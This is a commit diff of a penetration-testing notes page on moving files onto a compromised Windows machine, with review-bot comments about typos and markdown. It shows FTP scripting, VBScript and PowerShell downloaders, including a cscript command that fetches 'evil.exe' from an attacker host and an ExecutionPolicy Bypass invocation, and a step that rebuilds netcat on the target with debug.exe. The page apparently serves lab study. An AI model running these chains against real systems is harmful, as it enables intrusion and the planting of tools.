Commit ef8dc15c authored by bobloblaw

Updates transfering_files_to_windows.md

Auto commit by GitBook Editor
parent abb54639
+13 −13
@@ -2,8 +2,6 @@

Transferring files to linux is usually pretty easy. We can use netcat, wget, curl, which most systems have as default. But windows does not have these tools.



## FTP

Most windows machines have a ftp-client included. But we can't use it interactively since that most  likely would kill our shell. So we have get around that. We can however run commands from a file. So what we want to do is to echo out the commands into a textfile. And then use that as our input to the ftp-client. Let me demonstrate.
@@ -22,7 +20,7 @@ echo bye>> ftp.txt
Then run this command to connect to the ftp

```
ftp v -n -s:ftp.txt
ftp -v -n -s:ftp.txt
```

Of course you need to have a ftp-server configured with the user asshat and the password to mysecretpassword.
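Review bot: the corrected command `ftp -v -n -s:ftp.txt` is still shown without any explanation of its flags, which is what let the `v` typo go unnoticed in the first place. Add one sentence saying that `-v` suppresses the server's responses, `-n` disables auto-login and `-s:ftp.txt` reads the commands from the file, so the reader sees why the user name and password have to be echoed into ftp.txt. The sentence after the block also needs a wording fix: "the password to mysecretpassword" should read "the password mysecretpassword".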
@@ -63,6 +61,8 @@ I usually put all files I want to make available in **/usr/tftp**

Here is a good script to make a wget-clone in VB.

If it doesn't work try piping it through unix2dos before copying it.

```
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
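Review bot: the added sentence "If it doesn't work try piping it through unix2dos before copying it." does not say what "it" is or why the conversion helps. Name the thing being converted (the block of echo commands) and the reason (unix2dos converts LF line endings to CRLF, which the Windows shell expects), for example "If the pasted commands fail, convert the text to CRLF line endings with unix2dos before copying it." The line above could also say "VBScript" rather than "VB", since the file is wget.vbs and is run with cscript.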
@@ -89,14 +89,12 @@ echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

```

You then execute the script like this:   
**cscript wget.vbs http://192.168.10.5/evil.exe evil.exe** 

The script works great and I found it at the this guys gist: https://gist.github.com/sckalath/ec7af6a1786e3de6c309
**cscript wget.vbs **[http://192.168.10.5/evil.exe](http://192.168.10.5/evil.exe)** evil.exe**

The script works great and I found it at the this guys gist: [https://gist.github.com/sckalath/ec7af6a1786e3de6c309](https://gist.github.com/sckalath/ec7af6a1786e3de6c309)

## Powershell

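Review bot: the rewritten invocation line `**cscript wget.vbs **[http://192.168.10.5/evil.exe](http://192.168.10.5/evil.exe)** evil.exe**` breaks the emphasis: the first closing `**` follows a space and the second opening `**` precedes one, so CommonMark-style renderers print the asterisks literally, and the URL argument turns into a clickable link to a lab address. This looks like an editor auto-link rather than an intended change. Put the command in a fenced code block like the ftp and powershell commands in the same file, which keeps it copyable and unlinked. The retained sentence "I found it at the this guys gist" also still carries its typo ("at this guy's gist").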
@@ -111,11 +109,11 @@ echo $webclient.DownloadFile($url,$file) >>wget.ps1
```

Now we invoke it with this crazy syntax:

```
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
```


## Debug.exe

This is a crazy technique that works on windows 32 bit machines. Basically the idea is to use the debug.exe program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take a binaries, like netcat. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with debug.exe.
@@ -125,6 +123,7 @@ Debug.exe can only assemble 64 kb. So we need to use files smaller than that. We
```
upx -9 nc.exe
```

Now it only weights 29 kb. Perfect.So now let's disassemble it:

```
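Review bot: the blank line added after the upx block is fine, but the sentence right below it, "Now it only weights 29 kb. Perfect.So now let's disassemble it:", was left as is. Change "weights" to "weighs" and add the missing space after "Perfect." while this part of the file is being touched.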
@@ -132,3 +131,4 @@ wine exe2bat.exe nc.exe nc.txt
```

Perfect, now we just copy-past the text into our windows-shell. And it will automatically create a file called nc.exe